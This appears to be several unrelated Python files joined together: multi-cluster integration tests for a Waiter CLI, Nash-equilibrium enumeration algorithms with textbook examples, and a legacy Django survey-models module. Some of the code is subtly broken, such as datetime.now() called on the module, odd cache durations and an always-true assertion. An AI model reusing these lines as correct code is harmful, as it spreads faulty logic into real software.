def _test_choose_latest_configured_cluster(self, cluster_test_configs, expected_updated_cluster_index):
config = {'clusters': cluster_test_configs}
token_name = self.token_name()
expected_cluster_with_latest_token = cluster_test_configs[expected_updated_cluster_index]
# last token defined in the cluster_test_configs array will be the latest token
for cluster_test_config in cluster_test_configs:
util.post_token(cluster_test_config['url'], token_name, cluster_test_config['token-to-create'],
update_mode_admin=True)
try:
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(expected_cluster_with_latest_token['name'], cli.stdout(cp))
modified_token = util.load_token(expected_cluster_with_latest_token['url'], token_name,
expected_status_code=200)
self.assertEqual(version, modified_token['version'])
for cluster_test_config in cluster_test_configs:
waiter_url = cluster_test_config['url']
if waiter_url != expected_cluster_with_latest_token['url']:
not_modified_token = util.load_token(waiter_url, token_name, expected_status_code=200)
self.assertNotEqual(version, not_modified_token)
self.assertNotIn(cluster_test_config['name'], cli.stdout(cp))
finally:
for cluster_test_config in cluster_test_configs:
util.delete_token(cluster_test_config['url'], token_name)
def test_update_token_latest_configured_same_cluster(self):
sync_group_name = 'group_name'
cluster_test_configs = [{'name': 'waiter1',
'url': self.waiter_url_1,
'token-to-create': util.minimal_service_description(cluster=self.waiter_1_cluster),
'default-for-create': True,
'sync-group': sync_group_name},
{'name': 'waiter2',
'url': self.waiter_url_2,
'token-to-create': util.minimal_service_description(cluster=self.waiter_2_cluster),
'sync-group': sync_group_name}]
self._test_choose_latest_configured_cluster(cluster_test_configs, 1)
def test_update_token_latest_configured_different_cluster(self):
sync_group_name = 'group_name'
cluster_test_configs = [{'name': 'waiter1',
'url': self.waiter_url_1,
'token-to-create': util.minimal_service_description(cluster=self.waiter_1_cluster),
'default-for-create': True,
'sync-group': sync_group_name},
{'name': 'waiter2',
'url': self.waiter_url_2,
'token-to-create': util.minimal_service_description(cluster=self.waiter_1_cluster),
'sync-group': sync_group_name}]
self._test_choose_latest_configured_cluster(cluster_test_configs, 0)
def test_update_token_latest_configured_to_missing_cluster(self):
sync_group_1 = "sync-group-1"
unlisted_cluster_name = "unlisted_cluster"
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': sync_group_1},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': sync_group_1}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description(cluster=self.waiter_1_cluster))
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description(cluster=unlisted_cluster_name))
try:
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('The token is configured in cluster', cli.stderr(cp))
self.assertIn(unlisted_cluster_name, cli.stderr(cp))
self.assertIn(self.waiter_1_cluster, cli.stderr(cp))
self.assertIn(self.waiter_2_cluster, cli.stderr(cp))
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def _test_update_token_multiple_sync_groups(self, config):
token_name = self.token_name()
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description(cluster=self.waiter_2_cluster))
try:
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter2', cli.stdout(cp))
token_2 = util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
self.assertEqual(version, token_2['version'])
finally:
util.delete_token(self.waiter_url_2, token_name)
def test_update_token_multiple_sync_groups_no_conflict(self):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': "sync-group-1"},
{'name': 'waiter2', 'url': self.waiter_url_2,
'sync-group': "sync-group-2"}]}
self._test_update_token_multiple_sync_groups(config)
def test_update_token_multiple_sync_groups_not_listed(self):
# by default, if no sync group is listed the sync-group is given a unique group
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True},
{'name': 'waiter2', 'url': self.waiter_url_2}]}
self._test_update_token_multiple_sync_groups(config)
def test_update_token_multiple_sync_groups_with_conflict(self):
sync_group_1 = "sync-group-1"
sync_group_2 = "sync-group-2"
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': sync_group_1},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': sync_group_2}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description(cluster=self.waiter_1_cluster))
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description(cluster=self.waiter_2_cluster))
try:
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Could not infer the target cluster', cli.stderr(cp))
self.assertIn(sync_group_1, cli.stderr(cp))
self.assertIn(sync_group_2, cli.stderr(cp))
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def test_maintenance_start_latest_configured_cluster(self):
custom_maintenance_message = "custom maintenance message"
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'group_name'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'group_name'}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description(cluster=self.waiter_1_cluster))
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description(cluster=self.waiter_2_cluster))
try:
with cli.temp_config_file(config) as path:
cp = cli.maintenance('start', token_name, flags=f'--config {path}',
maintenance_flags=f'"{custom_maintenance_message}"')
self.assertEqual(0, cp.returncode, cp.stderr)
token_1 = util.load_token(self.waiter_url_1, token_name, expected_status_code=200)
token_2 = util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
self.assertEqual(custom_maintenance_message, token_2['maintenance']['message'])
self.assertTrue('maintenance' not in token_1)
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def test_maintenance_stop_latest_configured_cluster(self):
custom_maintenance_message = "custom maintenance message"
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'group_name'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'group_name'}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1,
token_name,
util.minimal_service_description(cluster=self.waiter_1_cluster,
maintenance={'message': custom_maintenance_message}))
util.post_token(self.waiter_url_2,
token_name,
util.minimal_service_description(cluster=self.waiter_2_cluster,
maintenance={'message': custom_maintenance_message}))
try:
with cli.temp_config_file(config) as path:
cp = cli.maintenance('stop', token_name, flags=f'--config {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
token_1 = util.load_token(self.waiter_url_1, token_name, expected_status_code=200)
token_2 = util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
self.assertTrue('maintenance' not in token_2)
self.assertTrue(custom_maintenance_message, token_1['maintenance']['message'])
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def test_maintenance_check_latest_configured_cluster(self):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'group_name'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'group_name'}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1,
token_name,
util.minimal_service_description(cluster=self.waiter_1_cluster,
maintenance={'message': "custom maintenance message"}))
util.post_token(self.waiter_url_2,
token_name,
util.minimal_service_description(cluster=self.waiter_2_cluster))
try:
with cli.temp_config_file(config) as path:
cp = cli.maintenance('check', token_name, flags=f'--config {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'{token_name} is not in maintenance mode', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def test_ping_via_token_cluster(self):
# Create in cluster #1
token_name = self.token_name()
token_data = util.minimal_service_description()
util.post_token(self.waiter_url_1, token_name, token_data)
try:
# Create in cluster #2
token_data['cluster'] = util.load_token(self.waiter_url_1, token_name)['cluster']
util.post_token(self.waiter_url_2, token_name, token_data)
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Ping the token, which should only ping in cluster #1
cp = cli.ping(token_name_or_service_id=token_name, flags=f'--config {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter1', cli.stdout(cp))
self.assertEqual(1, cli.stdout(cp).count('Pinging token'))
self.assertEqual(1, cli.stdout(cp).count('Not pinging token'))
self.assertEqual(1, len(util.services_for_token(self.waiter_url_1, token_name)))
self.assertEqual(0, len(util.services_for_token(self.waiter_url_2, token_name)))
# Ping the token in cluster #2 explicitly
cp = cli.ping(token_name_or_service_id=token_name, flags=f'--config {path} --cluster waiter2')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(1, cli.stdout(cp).count('Pinging token'))
self.assertEqual(0, cli.stdout(cp).count('Not pinging token'))
self.assertEqual(1, len(util.services_for_token(self.waiter_url_2, token_name)))
finally:
util.delete_token(self.waiter_url_2, token_name, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, kill_services=True)
def test_federated_tokens(self):
# Create in cluster #1
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description())
try:
# Single query for the tokens, federated across clusters
cluster_1 = f'foo_{uuid.uuid4()}'
cluster_2 = f'bar_{uuid.uuid4()}'
config = {'clusters': [{'name': cluster_1, 'url': self.waiter_url_1},
{'name': cluster_2, 'url': self.waiter_url_2}]}
with cli.temp_config_file(config) as path:
cp, tokens = cli.tokens_data(flags='--config %s' % path)
tokens = [t for t in tokens if t['token'] == token_name]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(1, len(tokens), tokens)
# Create in cluster #2
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description())
try:
# Again, single query for the tokens, federated across clusters
cp, tokens = cli.tokens_data(flags='--config %s' % path)
tokens = [t for t in tokens if t['token'] == token_name]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(2, len(tokens), tokens)
# Test the secondary sort on cluster
cp = cli.tokens(flags='--config %s' % path)
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(cluster_1, stdout)
self.assertIn(cluster_2, stdout)
self.assertLess(stdout.index(cluster_2), stdout.index(cluster_1))
finally:
util.delete_token(self.waiter_url_2, token_name)
finally:
util.delete_token(self.waiter_url_1, token_name)
def __test_ssh_same_service_id_on_multiple_clusters(self, create_empty_service=True):
token_name = self.token_name()
service_desc = util.minimal_service_description()
util.post_token(self.waiter_url_1, token_name, service_desc)
util.post_token(self.waiter_url_2, token_name, service_desc)
try:
# service ids should be the same as their service descriptions are the same
service1_id = util.create_empty_service_with_token(self.waiter_url_1, token_name) if create_empty_service \
else util.ping_token(self.waiter_url_1, token_name)
service2_id = util.ping_token(self.waiter_url_2, token_name)
self.assertEqual(service1_id, service2_id)
instances1 = [] if create_empty_service else \
util.instances_for_service(self.waiter_url_1, service1_id)['active-instances']
instances2 = util.instances_for_service(self.waiter_url_2, service2_id)['active-instances']
possible_instances = instances1 + instances2
env = os.environ.copy()
env['WAITER_SSH'] = 'echo'
env['WAITER_KUBECTL'] = 'echo'
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
cp = cli.ssh(token_or_service_id_or_instance_id=service1_id, stdin='1\n'.encode('utf8'), ssh_flags='-s',
flags=f'--config {path}', env=env)
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
# all instances should have been an option when prompting
self.assertFalse(util.get_instances_not_in_output(possible_instances, stdout))
# any one of the instances should have been attempted to ssh into
ssh_instance1 = None if create_empty_service else \
util.get_ssh_instance_from_output(self.waiter_url_1, instances1, stdout)
ssh_instance2 = util.get_ssh_instance_from_output(self.waiter_url_2, instances2, stdout)
found = ssh_instance1 is not None or ssh_instance2 is not None
self.assertTrue(found, msg=f"None of the possible instances {possible_instances} were detected in ssh "
f"command output: \n{stdout}")
finally:
util.delete_token(self.waiter_url_1, token_name, kill_services=True)
util.delete_token(self.waiter_url_2, token_name, kill_services=True)
def test_ssh_service_id_on_multiple_clusters_no_instances(self):
self.__test_ssh_same_service_id_on_multiple_clusters(create_empty_service=False)
def test_ssh_service_id_on_multiple_clusters_multiple_instances(self):
self.__test_ssh_same_service_id_on_multiple_clusters()
|
|
from itertools import combinations
import numpy as np
def _test(actual, expected, description=None, debug=False):
"""Compares the numerically derived list of Nash equilibria with the
expected (analytical) solution, and prints the result of the comparison
to screen.
Keyword arguments:
actual -- Numerically derived list of Nash equilibria (np.array assumed)
expected -- Expected (analytical) solution to the game
description -- (Optional) String description of the game
debug -- (Optional) True if print derived Nash equilibria to screen
"""
def _round_iterable(iterable, dec_places=5):
return map(lambda el: round(el, dec_places), iterable)
actual = set([(tuple(_round_iterable(x.flatten().tolist())), tuple(_round_iterable(y.flatten().tolist())))
for (x, y) in actual])
expected = set([(tuple(_round_iterable(x)), tuple(_round_iterable(y))) for (x, y) in expected])
result = "Test for game {}".format(description)
result += " passed." if actual == expected else " failed."
print(result)
if debug:
print("Derived MSNE for game {}:".format(description))
for ne in actual:
print("{}, {}".format(ne[0], ne[1]))
print()
def support_enumeration(payoff_matrix_p1, payoff_matrix_p2):
r"""Implements support enumeration algorithm for computing all Nash
equilibria of a bimatrix game specified by the input payoff matrices per
player, and returns a list consisting of all Nash equilibria of the game.
Each element of the returned list is a tuple of mixed strategies for both
players, with the first element being the mixed strategy of the first
player.
Full theoretical description of the algorithm can be found in
\"Algorithmic Game Theory\" by Nisan et al. (see Algorithm 3.4).
IMPORTANT: The algorithm requires the game to be _nondegenerate_.
Keyword arguments:
payoff_matrix_p1 -- Payoff matrix of player 1 (np.array assumed)
payoff_matrix_p2 -- Payoff matrix of player 2 (np.array assumed)
"""
# Input params
m, n = payoff_matrix_p1.shape
M = range(m)
N = range(n)
# Output params
msne = []
# 1. Find set K={1,...,min{m,n}}
K = range(1, min((m, n)) + 1)
# 2. For each k in K,
for k in K:
# 3. Let M(k) and N(k) be sets of all k-sized subsets of M and N,
# respectively. For each pair (I, J) such that I in M(k) and J in N(k),
for (I, J) in ((I, J) for I in combinations(M, k) for J in combinations(N, k)):
# 4. Solve for mixed strategy vectors x and y
x = np.zeros((m, 1))
y = np.zeros((n, 1))
if k == 1:
# Trivial case: pure strategies
x[I[0]] = 1
y[J[0]] = 1
else:
# Consider constraints for player 1
v = [np.array([payoff_matrix_p2[i, j] for i in I]) for j in J]
A = np.array([v[0]-v[p] for p in range(1, k)] + [np.ones((k, 1))])
b = np.array((k-1)*[0] + [1])
# Try solving matrix equation Ax = b using LU decomposition method
try:
solution = np.linalg.solve(A, b)
# -- if that fails, then x cannot form Nash equilibrium
except np.linalg.linalg.LinAlgError:
continue
# Create mixed strategy vector x
solution.resize(m)
indices = list(I)
if len(indices) < m:
indices += [p for p in range(m) if p not in indices]
for (i,j) in map(lambda i,j: (i,j), indices, range(m)):
x[i] = solution[j]
# For player 2
u = [np.array([payoff_matrix_p1[i, j] for j in J]) for i in I]
A = np.array([u[0]-u[p] for p in range(1, k)] + [np.ones((k, 1))])
b = np.array((k-1)*[0] + [1])
# Try solving matrix equation Ay = b using LU decomposition method
try:
solution = np.linalg.solve(A, b)
# -- if that fails, then y cannot form Nash equilibrium
except np.linalg.linalg.LinAlgError:
continue
# Create mixed strategy vector y
solution.resize(n)
indices = list(J)
if len(indices) < n:
indices += [p for p in range(n) if p not in indices]
for (i,j) in map(lambda i,j: (i,j), indices, range(n)):
y[i] = solution[j]
# Verify that (x, y) constitutes a Nash equilibrium
# 5. Check if both x and y are nonnegative
if all(x >= 0) and all(y >= 0):
# 6. Check if best response condition is met
# For x
v = [np.dot(x.flatten(), payoff_matrix_p2[:,j]) for j in J]
maximum_x = max([np.dot(x.flatten(), payoff_matrix_p2[:,n]) for n in N])
# For y
u = [np.dot(y.flatten(), payoff_matrix_p1[i,:]) for i in I]
maximum_y = max([np.dot(y.flatten(), payoff_matrix_p1[m,:]) for m in M])
# Account for numerical errors from dot product operation on floats
if list(map(lambda el: abs(el - maximum_x) <= .0000001, v)).count(True) == len(v) and \
list(map(lambda el: abs(el - maximum_y) <= .0000001, u)).count(True) == len(u):
# If the last condition is met, add (x, y) to solution list msne
msne += [(x, y)]
return msne
def vertex_enumeration(payoff_matrix_p1, payoff_matrix_p2):
r"""Implements vertex enumeration algorithm for computing all Nash
equilibria of a bimatrix game specified by the input payoff matrices per
player, and returns a list consisting of all Nash equilibria of the game.
Each element of the returned list is a tuple of mixed strategies for both
players, with the first element being the mixed strategy of the first
player.
Full theoretical description of the algorithm can be found in
\"Algorithmic Game Theory\" by Nisan et al. (see Algorithm 3.5).
IMPORTANT: The algorithm requires the game to be _nondegenerate_, and
payoff matrices of both players not containing a zero column.
Keyword arguments:
payoff_matrix_p1 -- Payoff matrix of player 1 (np.array assumed)
payoff_matrix_p2 -- Payoff matrix of player 2 (np.array assumed)
"""
# Input params
m, n = payoff_matrix_p1.shape
# Output params
msne = []
# 1. Preprocess by creating a nonnegative payoff matrix for either bidder
minimum = min(payoff_matrix_p1.flatten().tolist() + payoff_matrix_p2.flatten().tolist())
payoff_matrix_p1 += np.ones((m, n), dtype=int) * abs(minimum)
payoff_matrix_p2 += np.ones((m, n), dtype=int) * abs(minimum)
# 2. Find all vertices of player 1's polytope
# Let P be the dictionary of all vertices, where key are the labels
# corresponding to that particular vertex
P = {}
# Create matrices and vectors representing Player 1's polytope boundary constraints
identity = np.identity(m, dtype=int)
zeros_vector = np.zeros((m, 1), dtype=int)
ones_vector = np.ones((n, 1), dtype=int)
# For all m-combinations of the number of polytope boundary constraints,
for rows in combinations(range(m + n), m):
A = np.array([identity[i, :] if i < m else payoff_matrix_p2.transpose()[i % n, :] for i in rows])
b = np.array([zeros_vector[i, :] if i < m else ones_vector[i % n, :] for i in rows])
# Try solving matrix equation Ax = b using LU decomposition method
try:
x = np.linalg.solve(A, b)
# -- if that fails, then x cannot be a vertex
except np.linalg.linalg.LinAlgError:
continue
# Verify that mixed strategy vector x is a vertex
if all(np.dot(payoff_matrix_p2.transpose(), x.flatten()) <= 1) and \
all(np.dot(identity, x.flatten()) >= 0) and \
not all(x == 0):
P[rows] = x / np.sum(x)
# 3. Find all vertices of player 2's polytope (denote by Q; key=labels)
Q = {}
# Create matrices and vectors representing Player 2's polytope boundary constraints
# if the number of pure strategies is different between the players
if n != m:
identity = np.identity(n, dtype=int)
zeros_vector = np.zeros((n, 1), dtype=int)
ones_vector = np.ones((m, 1), dtype=int)
# For all n-combinations of the number of polytope boundary constraints,
for rows in combinations(range(n + m), n):
A = np.array([payoff_matrix_p1[i, :] if i < m else identity[i % n, :] for i in rows])
b = np.array([ones_vector[i, :] if i < m else zeros_vector[i % n, :] for i in rows])
# Try solving matrix equation Ay = b using LU decomposition method
try:
y = np.linalg.solve(A, b)
# -- if that fails, then y cannot be a vertex
except np.linalg.linalg.LinAlgError:
continue
# Verify that mixed strategy vector y is a vertex
if all(np.dot(payoff_matrix_p1, y.flatten()) <= 1) and \
all(np.dot(identity, y.flatten()) >= 0) and \
not all(y == 0):
Q[rows] = y / np.sum(y)
# 4. For each (x, y) if the pair is completely labeled, then (x, y) is an NE
msne = [(P[x_labels], Q[y_labels]) for y_labels in Q for x_labels in P
if len(set(list(x_labels) + list(y_labels))) == (m + n)]
return msne
if __name__ == '__main__':
### Test scenario1: Equation 3.3 Nisan et al. book
# Payoff matrices
payoff_matrix_p1 = np.array([[3, 3], [2, 5], [0, 6]], dtype=int)
payoff_matrix_p2 = np.array([[3, 2], [2, 6], [3, 1]], dtype=int)
# Expected result
expected = [((1.0, .0, .0), (1.0, .0)),
((.8, .2, .0), (2/3, 1/3)),
((.0, 1/3, 2/3), (1/3, 2/3))]
# Find MSNE using support enumeration algorithm
msne = support_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Equation 3.3/support")
# Find MSNE using vertex enumeration algorithm
msne = vertex_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Equation 3.3/vertex")
### Test scenario2: Matching Pennies
# Payoff matrices
payoff_matrix_p1 = np.array([[-1, 1], [1, -1]], dtype=int)
payoff_matrix_p2 = np.array([[1, -1], [-1, 1]], dtype=int)
# Expected result
expected = [((.5, .5), (.5, .5))]
# Find MSNE using support enumeration algorithm
msne = support_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Matching Pennies/support")
# Find MSNE using vertex enumeration algorithm
msne = vertex_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Matching Pennies/vertex")
### Test scenario3: Example 2.2 Nisan et al. book
# Payoff matrices
payoff_matrix_p1 = np.array([[0, 3, 0], [0, 0, 3], [2, 2, 2]], dtype=int)
payoff_matrix_p2 = payoff_matrix_p1.transpose()
# Expected result
expected = [((.0, 1/3, 2/3), (.0, 1/3, 2/3)),
((.0, 2/3, 1/3), (1/3, .0, 2/3)),
((1/3, .0, 2/3), (.0, 2/3, 1/3))]
# Find MSNE using support enumeration algorithm
msne = support_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Example 2.2/support")
# Find MSNE using vertex enumeration algorithm
msne = vertex_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Example 2.2/vertex")
### Test scenario4: Rock-Paper-Scissors game
# Payoff matrices
payoff_matrix_p1 = np.array([[0, -1, 1], [1, 0, -1], [-1, 1, 0]], dtype=int)
payoff_matrix_p2 = np.array([[0, 1, -1], [-1, 0, 1], [1, -1, 0]], dtype=int)
# Expected result
expected = [((1/3, 1/3, 1/3), (1/3, 1/3, 1/3))]
# Find MSNE using support enumeration algorithm
msne = support_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Rock-Paper-Scissors/support")
# Find MSNE using vertex enumeration algorithm
msne = vertex_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Rock-Paper-Scissors/vertex")
### Test scenario5: Equation 3.7 Nisan et al. book
# Payoff matrices
payoff_matrix_p1 = np.array([[3, 3, 0], [4, 0, 1], [0, 4, 5]], dtype=int)
payoff_matrix_p2 = payoff_matrix_p1.transpose()
# Expected result
expected = [((.0, .0, 1.0), (.0, .0, 1.0)),
((.75, .25, .0), (.75, .25, .0)),
((.5, .25, .25), (.5, .25, .25))]
# Find MSNE using support enumeration algorithm
msne = support_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Equation 3.7/support")
# Find MSNE using vertex enumeration algorithm
msne = vertex_enumeration(payoff_matrix_p1, payoff_matrix_p2)
_test(msne, expected, description="Equation 3.7/vertex")
|
|
"""Survey Models
"""
import datetime
from django.db import models
from django.conf import settings
from django.core.cache import cache
from django.utils import encoding
from django.template.defaultfilters import date as datefilter
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
QTYPE_CHOICES = (
('T', 'Text Input'),
('A', 'Text Area'),
('S', 'Select One Choice'),
('R', 'Radio List'),
('I', 'Radio Image List'),
('C', 'Checkbox List')
)
class SurveyManager(models.Manager):
def surveys_for(self, recipient):
recipient_type = ContentType.objects.get_for_model(recipient)
return Survey.objects.filter(visible=True,recipient_type=recipient_type, recipient_id=recipient.id)
class Survey(models.Model):
title = models.CharField(_('survey title'), max_length=80)
slug = models.SlugField(_('slug'), unique=True)
description= models.TextField(verbose_name=_("description"),
help_text=_("This field appears on the public web site and should give an overview to the interviewee"),
blank=True)
## Add validation on datetimes
opens = models.DateTimeField(_('survey starts accepting submissions on'))
closes = models.DateTimeField(_('survey stops accepting submissions on'))
# Define the behavior of the survey
visible = models.BooleanField(_('survey is visible'))
public = models.BooleanField(_('survey results are public'))
restricted = models.BooleanField(verbose_name=_("restrict the survey to authentified user")
,blank=True,default=False)
allows_multiple_interviews = models.BooleanField(verbose_name=_("allows multiple interviews")
,blank=True,default=True)
template_name = models.CharField(_('template name'),max_length=150,
null=True, blank=True,
help_text=_("This field is used to define a custom template (Example: 'dj_survey/template/my_add_interview_forms.html')."))
# Control who can edit the survey
# TODO: Plug this control in the view used to edit the survey
created_by = models.ForeignKey(User, related_name="created_surveys")
editable_by = models.ForeignKey(User,related_name="owned_surveys")
# Integration in Pinax
recipient_type = models.ForeignKey(ContentType,null=True)
recipient_id = models.PositiveIntegerField(null=True)
recipient = generic.GenericForeignKey('recipient_type', 'recipient_id')
objects = SurveyManager()
@property
def _cache_name(self):
if not self.id:
id = 'new'
else:
id = int(self.id)
return 'survey_' + repr(id) + '_status'
@property
def open(self):
if not self.visible: return False
value = cache.get(self._cache_name)
if value is not None: return value
now = datetime.datetime.now()
if self.opens >= now:
value = False
duration = (now - self.opens).seconds
elif self.closes >= now:
value = True
duration = (self.opens - now).seconds
else:
value = False
duration = 60*60*24*31
if duration:
cache.set(self._cache_name, value, duration)
return value
@property
def closed(self):
return not self.open
@property
def status(self):
if not self.visible: return _('private')
if self.open: return _('open')
if datetime.now() < self.opens:
return unicode(_('opens ')) + datefilter(self.opens)
return _('closed')
@property
def answer_count(self):
if hasattr(self, '_answer_count'):
return self._answer_count
self._answer_count = sum(q.answer_count for q in self.questions.iterator())
return self._answer_count
@property
def interview_count(self):
# NOTSURE: Do we realy need this optimisation?
if hasattr(self, '_interview_count'):
return self._interview_count
self._interview_count = len(Answer.objects.filter(
question__survey=self.id).values('interview_uuid').distinct())
return self._interview_count
@property
def session_key_count(self):
# NOTSURE: Do we realy need this optimisation?
if hasattr(self, '_session_key_count'):
return self._submission_count
self._submission_count = len(Answer.objects.filter(
question__survey=self.id).values('session_key').distinct())
return self._submission_count
def has_answers_from(self, session_key):
return bool(
Answer.objects.filter(session_key__exact=session_key.lower(),
question__survey__id__exact=self.id).distinct().count())
def has_answers_from_user(self, user):
return bool(
Answer.objects.filter(user = user,
question__survey__id__exact=self.id).distinct().count())
def __unicode__(self):
return u' - '.join([self.slug, self.title])
@models.permalink
def get_absolute_url(self):
return ('survey-detail', (), {'survey_slug': self.slug })
def save(self):
res = super(Survey, self).save()
cache.delete(self._cache_name)
return res
def answers_viewable_by(self, user):
if not self.visible: return False
if self.public: return True
if user.is_anonymous(): return False
return user.has_perm('survey.view_answers')
class Question(models.Model):
survey = models.ForeignKey(Survey, related_name='questions',
verbose_name=_('survey'))
qtype = models.CharField(_('question type'), max_length=2,
choices=QTYPE_CHOICES)
required = models.BooleanField(_('required'), default=True)
text = models.TextField(_('question text'))
order = models.IntegerField(verbose_name = _("order"),
null=True, blank=True)
# TODO: Add a button or check box to remove the file. There are several
# recipes floating on internet. I like the one with a custom widget
image = models.ImageField(verbose_name=_("image"),
upload_to= "survey/images/questions" + "/%Y/%m/%d/",
null=True, blank= True)
# Define if the user must select at least 'choice_num_min' number of
# choices and at most 'choice_num_max'
choice_num_min = models.IntegerField(_("minimum number of choices"),
null=True, blank=True,)
choice_num_max = models.IntegerField(_("maximum number of choices"),
null=True, blank=True,)
# TODO: Modify the forms to respect the style defined by this attr (html,css)
qstyle = models.TextField(_("Html Style"),null=True, blank=True)
## model validation for requiring choices.
@property
def answer_count(self):
if hasattr(self, '_answer_count'):
return self._answer_count
self._answer_count = self.answers.count()
return self._answer_count
def __unicode__(self):
return u' - '.join([self.survey.slug, self.text])
class Meta:
unique_together = (('survey', 'text'),)
order_with_respect_to='survey'
ordering = ('survey', 'order')
class Admin:
list_select_related = True
list_filter = ('survey', 'qtype')
list_display_links = ('text',)
list_display = ('survey', 'text', 'qtype', 'required')
search_fields = ('text',)
@models.permalink
def get_update_url(self):
return ('question-update', (), {'survey_slug': self.survey.slug,'question_id' :self.id })
# TODO: add this a fallback to this optimisation with django ORM.
@property
def choice_count(self):
return self.choices.count()
class Choice(models.Model):
## validate question is of proper qtype
question = models.ForeignKey(Question, related_name='choices',
verbose_name=_('question'))
text = models.CharField(_('choice text'), max_length=500)
# TODO: Add a button or check box to remove the file. There are several
# recipes floating on internet. I like the one with a custom widget
image = models.ImageField(verbose_name = _("image"),
upload_to= "survey/images/questions" + "/%Y/%m/%d/",
null=True ,blank= True)
order = models.IntegerField(verbose_name = _("order"),
null=True, blank=True)
@models.permalink
def get_update_url(self):
return ('choice-update', (), {'question_id': self.question.id,'choice_id' :self.id })
@property
def count(self):
if hasattr(self, '_count'):
return self._count
self._count = Answer.objects.filter(question=self.question_id,
text=self.text).count()
return self._count
def __unicode__(self):
return self.text
class Meta:
unique_together = (('question', 'text'),)
order_with_respect_to='question'
ordering = ('question', 'order')
class Answer(models.Model):
user = models.ForeignKey(User, related_name='answers',
verbose_name=_('user'), editable=False,
blank=True,null=True)
question = models.ForeignKey(Question, related_name='answers',
verbose_name=_('question'),
editable=False)
## sessions expire, survey results do not, so keep the key.
session_key = models.CharField(_('session key'), max_length=40)
text = models.TextField(_('answer text'))
submission_date = models.DateTimeField(auto_now=True)
# UUID is used to calculate the number of interviews
interview_uuid = models.CharField(_("Interview unique identifier"),max_length=36)
class Meta:
# unique_together = (('question', 'session_key'),)
permissions = (("view_answers", "Can view survey answers"),
("view_submissions", "Can view survey submissions"))
|
|
#!/usr/bin/env python
# The MIT License (MIT)
#
